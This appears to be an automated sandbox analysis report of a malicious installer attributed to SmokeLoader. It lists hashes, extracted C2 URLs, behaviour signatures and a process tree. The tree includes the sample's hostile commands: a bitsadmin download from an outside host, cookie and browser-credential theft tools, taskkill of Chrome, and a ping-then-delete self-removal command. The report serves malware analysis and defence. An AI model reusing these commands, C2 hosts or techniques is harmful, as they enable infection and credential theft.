Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    116s
  • max time network
    215s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    04-05-2021 14:36

Errors

Reason
Machine shutdown

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • Detected facebook phishing page
  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 26 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 60 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies data under HKEY_USERS 33 IoCs
  • Modifies registry class 34 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:872
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {DEC4F697-9165-462C-80C1-F78DB8D7B925} S-1-5-18:NT AUTHORITY\System:Service:
          3⤵
            PID:1056
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
              4⤵
                PID:3156
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                4⤵
                  PID:3944
                • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                  4⤵
                    PID:4084
                  • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                    "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                    4⤵
                      PID:4284
                    • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                      "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                      4⤵
                        PID:4316
                      • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                        "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                        4⤵
                          PID:4308
                    • C:\Windows\system32\msiexec.exe
                      C:\Windows\system32\msiexec.exe /V
                      2⤵
                      • Enumerates connected drives
                      • Drops file in Program Files directory
                      • Drops file in Windows directory
                      • Modifies data under HKEY_USERS
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4076
                      • C:\Windows\syswow64\MsiExec.exe
                        C:\Windows\syswow64\MsiExec.exe -Embedding A703DB71311249C9E9D0DF172786D279 C
                        3⤵
                        • Loads dropped DLL
                        PID:2432
                      • C:\Windows\syswow64\MsiExec.exe
                        C:\Windows\syswow64\MsiExec.exe -Embedding 1A153252002093CED4F5344E5CA7DE1C
                        3⤵
                        • Blocklisted process makes network request
                        • Loads dropped DLL
                        PID:3868
                        • C:\Windows\SysWOW64\taskkill.exe
                          "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                          4⤵
                          • Kills process with taskkill
                          PID:3940
                      • C:\Windows\syswow64\MsiExec.exe
                        C:\Windows\syswow64\MsiExec.exe -Embedding CCB1B6DC295F29C1B7DF2EADC0B2DBD0 M Global\MSI0000
                        3⤵
                        • Loads dropped DLL
                        PID:2204
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                      2⤵
                      • Drops file in System32 directory
                      • Checks processor information in registry
                      • Modifies data under HKEY_USERS
                      • Modifies registry class
                      PID:2196
                  • C:\Users\Admin\AppData\Local\Temp\Install.exe
                    "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                    1⤵
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:684
                    • C:\Users\Admin\AppData\Local\Temp\is-T6PIU.tmp\Install.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-T6PIU.tmp\Install.tmp" /SL5="$3011C,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:1520
                      • C:\Users\Admin\AppData\Local\Temp\is-AMQMF.tmp\Ultra.exe
                        "C:\Users\Admin\AppData\Local\Temp\is-AMQMF.tmp\Ultra.exe" /S /UID=burnerch1
                        3⤵
                        • Drops file in Drivers directory
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious use of WriteProcessMemory
                        PID:1016
                        • C:\Program Files\Common Files\IQEGYQMCVK\ultramediaburner.exe
                          "C:\Program Files\Common Files\IQEGYQMCVK\ultramediaburner.exe" /VERYSILENT
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:316
                          • C:\Users\Admin\AppData\Local\Temp\is-QPCD6.tmp\ultramediaburner.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-QPCD6.tmp\ultramediaburner.tmp" /SL5="$8012A,281924,62464,C:\Program Files\Common Files\IQEGYQMCVK\ultramediaburner.exe" /VERYSILENT
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in Program Files directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of WriteProcessMemory
                            PID:1644
                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                              6⤵
                              • Executes dropped EXE
                              PID:1020
                        • C:\Users\Admin\AppData\Local\Temp\24-29720-fe5-a2981-12a7eb0129a0f\Sikavyvyvae.exe
                          "C:\Users\Admin\AppData\Local\Temp\24-29720-fe5-a2981-12a7eb0129a0f\Sikavyvyvae.exe"
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:2032
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                            5⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:1820
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1820 CREDAT:275457 /prefetch:2
                              6⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:1580
                        • C:\Users\Admin\AppData\Local\Temp\65-10353-f5a-29985-5e1a330f34c8e\Qoriwynele.exe
                          "C:\Users\Admin\AppData\Local\Temp\65-10353-f5a-29985-5e1a330f34c8e\Qoriwynele.exe"
                          4⤵
                          • Executes dropped EXE
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:1696
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\egwcelxk.okv\KiffMainE1.exe & exit
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3236
                            • C:\Users\Admin\AppData\Local\Temp\egwcelxk.okv\KiffMainE1.exe
                              C:\Users\Admin\AppData\Local\Temp\egwcelxk.okv\KiffMainE1.exe
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3384
                              • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                dw20.exe -x -s 532
                                7⤵
                                  PID:3532
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mr0yjl1e.tix\001.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3456
                              • C:\Users\Admin\AppData\Local\Temp\mr0yjl1e.tix\001.exe
                                C:\Users\Admin\AppData\Local\Temp\mr0yjl1e.tix\001.exe
                                6⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:3504
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tof0dcfk.jis\installer.exe /qn CAMPAIGN="654" & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3616
                              • C:\Users\Admin\AppData\Local\Temp\tof0dcfk.jis\installer.exe
                                C:\Users\Admin\AppData\Local\Temp\tof0dcfk.jis\installer.exe /qn CAMPAIGN="654"
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Enumerates connected drives
                                • Modifies system certificate store
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of FindShellTrayWindow
                                PID:3680
                                • C:\Windows\SysWOW64\msiexec.exe
                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\tof0dcfk.jis\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\tof0dcfk.jis\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619886693 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                  7⤵
                                    PID:3348
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ltlx14hx.rtx\gpooe.exe & exit
                                5⤵
                                  PID:3724
                                  • C:\Users\Admin\AppData\Local\Temp\ltlx14hx.rtx\gpooe.exe
                                    C:\Users\Admin\AppData\Local\Temp\ltlx14hx.rtx\gpooe.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Adds Run key to start application
                                    • Modifies system certificate store
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:3796
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      7⤵
                                      • Executes dropped EXE
                                      PID:3864
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      7⤵
                                      • Executes dropped EXE
                                      PID:2156
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\flbkjryo.cvf\google-game.exe & exit
                                  5⤵
                                    PID:4056
                                    • C:\Users\Admin\AppData\Local\Temp\flbkjryo.cvf\google-game.exe
                                      C:\Users\Admin\AppData\Local\Temp\flbkjryo.cvf\google-game.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                      • Suspicious use of SetWindowsHookEx
                                      PID:972
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                        7⤵
                                        • Loads dropped DLL
                                        • Modifies registry class
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1608
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d51kpzci.yb0\askinstall39.exe & exit
                                    5⤵
                                      PID:2072
                                      • C:\Users\Admin\AppData\Local\Temp\d51kpzci.yb0\askinstall39.exe
                                        C:\Users\Admin\AppData\Local\Temp\d51kpzci.yb0\askinstall39.exe
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2236
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          7⤵
                                            PID:3360
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              8⤵
                                              • Kills process with taskkill
                                              PID:3524
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eoersqal.33i\setup.exe & exit
                                        5⤵
                                          PID:2300
                                          • C:\Users\Admin\AppData\Local\Temp\eoersqal.33i\setup.exe
                                            C:\Users\Admin\AppData\Local\Temp\eoersqal.33i\setup.exe
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            PID:2336
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\eoersqal.33i\setup.exe"
                                              7⤵
                                                PID:2540
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 1.1.1.1 -n 1 -w 3000
                                                  8⤵
                                                  • Runs ping.exe
                                                  PID:2584
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bpxyk2le.ubj\request2.exe & exit
                                            5⤵
                                              PID:2652
                                              • C:\Users\Admin\AppData\Local\Temp\bpxyk2le.ubj\request2.exe
                                                C:\Users\Admin\AppData\Local\Temp\bpxyk2le.ubj\request2.exe
                                                6⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                PID:2724
                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:2792
                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                    parse.exe -f json -b firefox
                                                    8⤵
                                                      PID:3228
                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                      parse.exe -f json -b chrome
                                                      8⤵
                                                        PID:3392
                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                                        parse.exe -f json -b edge
                                                        8⤵
                                                          PID:3300
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pwgqvy4x.1g1\SunLabsPlayer.exe /S & exit
                                                    5⤵
                                                      PID:2820
                                                      • C:\Users\Admin\AppData\Local\Temp\pwgqvy4x.1g1\SunLabsPlayer.exe
                                                        C:\Users\Admin\AppData\Local\Temp\pwgqvy4x.1g1\SunLabsPlayer.exe /S
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Drops file in Program Files directory
                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                        PID:2896
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:3648
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:2752
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:1220
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:3284
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:2152
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:3904
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:4392
                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                        7⤵
                                                                        • Download via BitsAdmin
                                                                        PID:3200
                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfGNXVQDAS5gsjBB -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                        7⤵
                                                                          PID:7964
                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pqoEjL4JJuJeAe4u -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                          7⤵
                                                                            PID:8000
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:8036
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:8132
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:1908
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:7604
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                                                    7⤵
                                                                                      PID:7680
                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll" ogdtzM
                                                                                      7⤵
                                                                                        PID:7768
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll" ogdtzM
                                                                                          8⤵
                                                                                            PID:7776
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                                                          7⤵
                                                                                            PID:7804
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                                                            7⤵
                                                                                              PID:7924
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                                PID:7964
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                  PID:8060
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi7522.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:8148
                                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                    7⤵
                                                                                                      PID:1576
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bbupbqvr.teq\005.exe & exit
                                                                                                  5⤵
                                                                                                    PID:2868
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bbupbqvr.teq\005.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\bbupbqvr.teq\005.exe
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                      PID:2912
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2hnwpdrj.3kk\ifhwwyy.exe & exit
                                                                                                    5⤵
                                                                                                      PID:2960
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2hnwpdrj.3kk\ifhwwyy.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\2hnwpdrj.3kk\ifhwwyy.exe
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                        PID:3036
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          7⤵
                                                                                                            PID:3224
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:3608
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ktlwcfu4.kpd\toolspab1.exe & exit
                                                                                                        5⤵
                                                                                                          PID:3088
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ktlwcfu4.kpd\toolspab1.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\ktlwcfu4.kpd\toolspab1.exe
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                            PID:3116
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ktlwcfu4.kpd\toolspab1.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\ktlwcfu4.kpd\toolspab1.exe
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:3304
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i0yp4pxc.rno\GcleanerWW.exe /mixone & exit
                                                                                                          5⤵
                                                                                                            PID:3164
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zgxrkrm5.5ys\42a25820.exe & exit
                                                                                                            5⤵
                                                                                                              PID:3408
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\zgxrkrm5.5ys\42a25820.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\zgxrkrm5.5ys\42a25820.exe
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:3288
                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe "-1612052939150021838-140528709-176408509476308988-19842567252106200019-460863046"
                                                                                                      1⤵
